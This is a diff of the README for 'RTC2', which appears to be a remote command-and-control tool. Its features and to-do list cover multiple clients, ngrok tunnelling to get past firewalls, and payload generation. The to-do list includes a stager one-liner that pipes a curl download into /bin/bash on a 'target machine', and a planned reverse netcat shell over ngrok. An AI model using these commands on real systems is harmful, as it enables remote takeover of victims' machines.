AgeOfMarcus/RTC2/README.md

 This also lets all communication happen via https for extra security.
 As well as this, all communication is encrypted with private/public key pairs.

 # Features
-â€¢ Handles multiple clients
+• Handles multiple clients

-â€¢ Interactive "command-line" interface with tab autocomplete
+• Interactive "command-line" interface with tab autocomplete

-â€¢ Very modular and easy to reuse code
+• Very modular and easy to reuse code

-â€¢ Unique-Identifier-based command system (easy to find results of commands)
+• Unique-Identifier-based command system (easy to find results of commands)

-â€¢ Automatically handles secure port forwarding with ngrok (works behind firewalls)

-â€¢ Has function to generate payloads

 # Todo
-â€¢ Utilise private/public key pairs
+• Utilise private/public key pairs

+• Finish adding in automated ngrok reverse tunneling

+• Write some simple payload templates

-â€¢ Write a function to build said templates with correct server details
+• Write a function to build said templates with correct server details

-â€¢ Add a stager function to the server so it's possible to do "curl https://serveraddr.ngrok.io/stager | /bin/bash" on target machine (bash script should echo python program line-by-line or just completely bash)
+• Add a stager function to the server so it's possible to do "curl https://serveraddr.ngrok.io/stager | /bin/bash" on target machine (bash script should echo python program line-by-line or just completely bash)

-â€¢ Add timestamps to commands

-â€¢ Sort commands by most recent

-â€¢ Add commands to generate one-liner stagers

-â€¢ Add auto-reverse-netcat-ngrok command (target: find ver, down ngrok, nc -l, ngrok tcp, send url)

-â€¢ On exit: write completed commands into db

-â€¢ Add command to import db of completed commands

-â€¢ Layered autocomplete (is that a thing??)

 # WIP
 This is a huge work-in-progress, so expect lots of bugs and not so many feautures just yet.